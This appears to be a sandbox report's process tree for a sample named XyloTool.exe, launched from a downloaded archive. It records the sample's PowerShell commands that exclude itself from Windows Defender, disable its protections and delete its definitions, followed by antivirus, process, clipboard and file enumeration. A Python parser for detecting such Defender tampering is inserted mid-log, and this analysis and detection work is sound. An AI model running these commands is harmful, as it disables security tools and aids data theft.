C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.4.1356212022\1164133433" -childID 3 -isForBrowser -prefsHandle 5168 -prefMapHandle 5164 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97da2b5c-4347-42bd-86f1-507ad3b160be} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5180 2fed233fe58 tab3⤵PID:1228
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.5.1394154044\1857127210" -childID 4 -isForBrowser -prefsHandle 5312 -prefMapHandle 5316 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b07befdf-24f4-4534-b741-b5acbd6c7c44} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5304 2fed2e70a58 tab3⤵PID:4352
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.6.827780039\676138984" -childID 5 -isForBrowser -prefsHandle 5508 -prefMapHandle 5512 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9448d54-d316-4272-918f-3172d1a0cbac} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5496 2fed2e71c58 tab3⤵PID:2448
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.7.191482268\258674567" -childID 6 -isForBrowser -prefsHandle 1536 -prefMapHandle 2636 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95b72987-d9d9-418a-8620-e8eb7046e258} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5792 2fed407f558 tab3⤵PID:1764
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.8.1684474144\338674860" -parentBuildID 20230214051806 -prefsHandle 6064 -prefMapHandle 1564 -prefsLen 27697 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a248d000-0d31-40c3-8ec7-ee6170945729} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5988 2fed02d7058 rdd3⤵PID:4808
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.9.1102547069\110656528" -childID 7 -isForBrowser -prefsHandle 10040 -prefMapHandle 10044 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54dbb319-ef2d-4289-9737-a85292bc8889} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10080 2fed4efa258 tab3⤵PID:1472
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.10.1677778235\723996722" -childID 8 -isForBrowser -prefsHandle 9800 -prefMapHandle 9768 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69969fe8-05c9-4a79-8d78-bb3414f02c73} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9808 2fed407fe58 tab3⤵PID:5376
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.11.1775630829\2101987883" -childID 9 -isForBrowser -prefsHandle 9580 -prefMapHandle 9568 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75b43ce5-ac76-432e-b0db-4f69a799903b} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9588 2fed5549858 tab3⤵PID:5672
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.12.227401379\727617421" -childID 10 -isForBrowser -prefsHandle 9344 -prefMapHandle 9592 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26127f2f-2a49-436b-b398-eda6ad763ad3} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9740 2fed554a458 tab3⤵PID:5680
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.13.1290499912\583534012" -childID 11 -isForBrowser -prefsHandle 9100 -prefMapHandle 9168 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9fe2a69-2ef6-4496-a760-a8f00c102847} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9092 2fed554cb58 tab3⤵PID:5688
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.14.642554077\2051119939" -childID 12 -isForBrowser -prefsHandle 8744 -prefMapHandle 8748 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2417fe8-6063-45bf-b79a-4183975bd621} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9504 2fed5c6a158 tab3⤵PID:5908
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.15.920982380\996574547" -childID 13 -isForBrowser -prefsHandle 8512 -prefMapHandle 8516 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5859a7ee-39e0-4356-957f-7c77f031626d} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8552 2fed614b258 tab3⤵PID:5168
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.16.689338010\40834246" -childID 14 -isForBrowser -prefsHandle 8496 -prefMapHandle 8492 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0011d17-89d7-4eaa-b403-d7dc6966b1aa} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8480 2fed484d958 tab3⤵PID:6264
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.17.682845685\925525864" -childID 15 -isForBrowser -prefsHandle 8572 -prefMapHandle 8504 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fc82461-87e6-4268-8e9c-438c43b7a3fe} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9568 2fed484be58 tab3⤵PID:6304
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.18.1382773691\1985378191" -childID 16 -isForBrowser -prefsHandle 8104 -prefMapHandle 8108 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56f9be48-b968-4dbf-8294-26f5830de36c} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8096 2fed666d658 tab3⤵PID:6648
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.19.1736049878\1858377365" -childID 17 -isForBrowser -prefsHandle 7876 -prefMapHandle 7872 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2c4455c-ee49-4d66-b744-824d5905de58} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 8076 2fed68aaa58 tab3⤵PID:6820
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.20.24613621\1794545916" -childID 18 -isForBrowser -prefsHandle 8160 -prefMapHandle 7848 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {079944ca-a273-409b-90e7-4236f81f7904} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7840 2fed68ab958 tab3⤵PID:6832
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.21.357398867\1418662110" -childID 19 -isForBrowser -prefsHandle 7536 -prefMapHandle 7540 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf40c48f-be26-4f19-8608-6ef7156f7650} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7644 2fed6abba58 tab3⤵PID:6844
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.22.718358192\1718980534" -childID 20 -isForBrowser -prefsHandle 7440 -prefMapHandle 7528 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed80a11e-9f11-4f37-8555-0dff35d1fe47} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7872 2fed6abcc58 tab3⤵PID:6860
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.23.1574448988\1929654738" -childID 21 -isForBrowser -prefsHandle 7276 -prefMapHandle 7776 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81afc695-c950-4080-8563-02c7ef4886c7} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7772 2fed71bde58 tab3⤵PID:6892
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.24.863064804\1537022992" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 8856 -prefMapHandle 6888 -prefsLen 27776 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9aa5918f-fc46-46d0-821e-e7879fca8ff6} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6868 2fed5d8d558 utility3⤵PID:5668
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.25.439946013\530452240" -childID 22 -isForBrowser -prefsHandle 6812 -prefMapHandle 6816 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7017438d-6f4b-4233-8cc2-934cb2a2ac34} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7192 2fed58a8658 tab3⤵PID:5656
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.26.2065785418\1000208025" -childID 23 -isForBrowser -prefsHandle 6624 -prefMapHandle 6620 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81b3afdf-9b5f-4b62-98be-33d418198abd} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6632 2fed5d8fc58 tab3⤵PID:7200
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.27.1308398905\1705913018" -childID 24 -isForBrowser -prefsHandle 6524 -prefMapHandle 6520 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d34bed5b-3989-40a8-b365-6d1b0be5df51} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6536 2fed601c658 tab3⤵PID:7208
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.28.1385589469\12902816" -childID 25 -isForBrowser -prefsHandle 6272 -prefMapHandle 6276 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f075c15-bd15-4cda-b19f-49ca9982c4cb} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 6264 2febe940358 tab3⤵PID:7228
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.29.923430430\59486449" -childID 26 -isForBrowser -prefsHandle 4944 -prefMapHandle 10376 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {826d0806-87a2-4f78-8774-8a3bcdc1eea3} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10404 2fed3d62358 tab3⤵PID:8164
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.30.687212624\1877107049" -childID 27 -isForBrowser -prefsHandle 10152 -prefMapHandle 10632 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33b24705-447b-4ee5-99fb-5cd8e6eb6140} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10572 2feddb13658 tab3⤵PID:7688
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.31.359620658\229773335" -childID 28 -isForBrowser -prefsHandle 5924 -prefMapHandle 3572 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82902407-8125-4072-949a-d41f9ac4de56} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10824 2fedebf8958 tab3⤵PID:4500
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.32.1891966997\666259169" -childID 29 -isForBrowser -prefsHandle 10312 -prefMapHandle 10324 -prefsLen 31301 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6b41c96-b6fa-48c4-9ec6-efbfaacc580b} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10300 2fedf978e58 tab3⤵PID:7524
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.33.165701030\877517440" -childID 30 -isForBrowser -prefsHandle 8640 -prefMapHandle 6980 -prefsLen 31397 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e64a8df2-0176-4ab7-bb2d-976018e0fc5e} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10932 2fed0b77b58 tab3⤵PID:1916
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.34.1724721587\413791983" -childID 31 -isForBrowser -prefsHandle 10720 -prefMapHandle 3836 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e748b28b-dc44-495d-9cc7-44fb77058598} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10708 2fed0f8ee58 tab3⤵PID:3524
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.35.195616879\550843068" -childID 32 -isForBrowser -prefsHandle 10848 -prefMapHandle 10832 -prefsLen 31406 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91a25632-112b-4bed-95cb-81e2f9f2c27c} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10788 2fed407fb58 tab3⤵PID:7196
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.36.471017351\488335513" -childID 33 -isForBrowser -prefsHandle 10228 -prefMapHandle 5912 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b765b09c-523a-428e-a215-a5040bf5dbcf} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 3112 2fed0de8858 tab3⤵PID:7800
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.37.1930599041\747725068" -childID 34 -isForBrowser -prefsHandle 10224 -prefMapHandle 6420 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c59decf-f162-4658-a7c0-34cf417a7b45} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 4264 2fed0f8dc58 tab3⤵PID:7908
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.38.728469841\746336893" -childID 35 -isForBrowser -prefsHandle 6384 -prefMapHandle 8832 -prefsLen 31415 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d34940b5-6e49-481a-b320-a6623b6a5087} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 7004 2febe978d58 tab3⤵PID:9004
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1072
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:8144 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\XyloTool.rar2⤵
- Opens file in notepad (likely ransom note)
PID:8164
-
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2000
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\XyloTool.rar1⤵
- Opens file in notepad (likely ransom note)
PID:7700
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XyloTool.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:7336
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\41984dd47e114aa2859cd35371f64bc8 /t 7244 /p 20001⤵PID:7024
-
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"1⤵
- Executes dropped EXE
PID:4836 -
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"3⤵PID:7364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:8072 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:3356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3276 -
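The two cmd.exe entries above are the sample's Defender tampering: `Add-MpPreference -ExclusionPath` whitelists its own executable, then one `Set-MpPreference` call turns off real-time protection, IOAV, script scanning and intrusion prevention, disables controlled folder access, puts network protection in audit mode, and switches off MAPS reporting and sample submission (NeverSend, repeated as its numeric value 2), before `MpCmdRun.exe -RemoveDefinitions -All` deletes the signatures. The parser below is an added example, not code from the report or the sample: it unwraps the `cmd.exe /c "..."` wrapper, splits the `&&`/`&` chain, and turns each `*-MpPreference` parameter and the `MpCmdRun` call into a finding. `PAGE_DEFENDER_CHAIN` and `PAGE_EXCLUSION` are copies of the two command lines on this page; parameter abbreviations (PowerShell accepts unique prefixes) and `&` inside quoted values are not handled.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Boolean Set-MpPreference parameters that turn a protection off when $true
DISABLE_SWITCHES = {
    "disablerealtimemonitoring": "real-time protection",
    "disableioavprotection": "scanning of downloaded files and attachments (IOAV)",
    "disablescriptscanning": "script scanning",
    "disableintrusionpreventionsystem": "network intrusion prevention",
    "disablebehaviormonitoring": "behavior monitoring",
}
# Enum-valued parameters and the names or numbers that weaken them
WEAK_VALUES = {
    "mapsreporting": {"disabled", "0"},
    "submitsamplesconsent": {"neversend", "2"},
    "enablecontrolledfolderaccess": {"disabled", "0"},
    "enablenetworkprotection": {"disabled", "0", "auditmode", "2"},
}
EXCLUSION_PARAMS = {"exclusionpath", "exclusionprocess", "exclusionextension", "exclusionipaddress"}
TRUE_VALUES = {"$true", "true", "1"}

_CMD_WRAPPER = re.compile(r'^\s*(?:"?[^"\s]*cmd(?:\.exe)?"?\s+/[cCkK]\s+)?"?(.*?)"?\s*$', re.S)
_SEPARATOR = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")      # cmd.exe command separators
_TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')          # quoted strings stay one token


@dataclass
class Finding:
    parameter: str
    value: Optional[str]
    description: str


def _tokens(segment: str) -> List[str]:
    out = []
    for tok in _TOKEN.findall(segment):
        if len(tok) >= 2 and tok[0] in "\"'" and tok[-1] == tok[0]:
            tok = tok[1:-1]
        out.append(tok)
    return out


def _parameters(tokens: List[str]):
    """Yield (name, value) for -Name [value] pairs; a following -Flag means no value."""
    i = 0
    while i < len(tokens):
        if tokens[i].startswith("-") and len(tokens[i]) > 1:
            name, value = tokens[i][1:], None
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                value = tokens[i + 1]
                i += 1
            yield name, value
        i += 1


def analyze_segment(segment: str) -> List[Finding]:
    tokens = _tokens(segment)
    lowered = [t.lower() for t in tokens]
    findings: List[Finding] = []
    if any(t.endswith("mpcmdrun.exe") for t in lowered) and "-removedefinitions" in lowered:
        findings.append(Finding("RemoveDefinitions", "All" if "-all" in lowered else None,
                                "deletes Defender signature definitions via MpCmdRun.exe"))
    cmdlet = next((i for i, t in enumerate(lowered) if t in ("set-mppreference", "add-mppreference")), None)
    if cmdlet is None:
        return findings
    for name, value in _parameters(tokens[cmdlet + 1:]):
        key, low = name.lower(), (value or "").lower()
        if key in DISABLE_SWITCHES and low in TRUE_VALUES:
            findings.append(Finding(name, value, f"turns off {DISABLE_SWITCHES[key]}"))
        elif key in WEAK_VALUES and low in WEAK_VALUES[key]:
            findings.append(Finding(name, value, f"weakens {name} (set to {value})"))
        elif key in EXCLUSION_PARAMS:
            findings.append(Finding(name, value, f"adds a Defender exclusion ({name})"))
    return findings


def analyze_command(cmdline: str) -> List[Finding]:
    """Unwrap cmd.exe /c "...", split the && / & chain, and collect findings from every segment."""
    inner = _CMD_WRAPPER.match(cmdline).group(1)
    findings: List[Finding] = []
    for segment in _SEPARATOR.split(inner):
        if segment:
            findings.extend(analyze_segment(segment))
    return findings


# The two command lines from this report
PAGE_EXCLUSION = r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"
PAGE_DEFENDER_CHAIN = r'C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"'

if __name__ == "__main__":
    for line in (PAGE_EXCLUSION, PAGE_DEFENDER_CHAIN):
        for f in analyze_command(line):
            print(f"{f.parameter:34} {str(f.value):40} {f.description}")
```

A single `Set-MpPreference` that flips four Disable* switches and three reporting settings in one call, followed by `-RemoveDefinitions`, is the pattern to alert on; a benign administrator invocation such as `Set-MpPreference -DisableRealtimeMonitoring $false` yields no findings. On a live host the same parameters can be read back with `Get-MpPreference` to confirm whether the tampering took effect (it requires administrator rights, and Tamper Protection blocks it when enabled).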
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1452
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1140 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:7428
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3180
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:5276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:5132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:6500 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1420
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:7120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1496
-
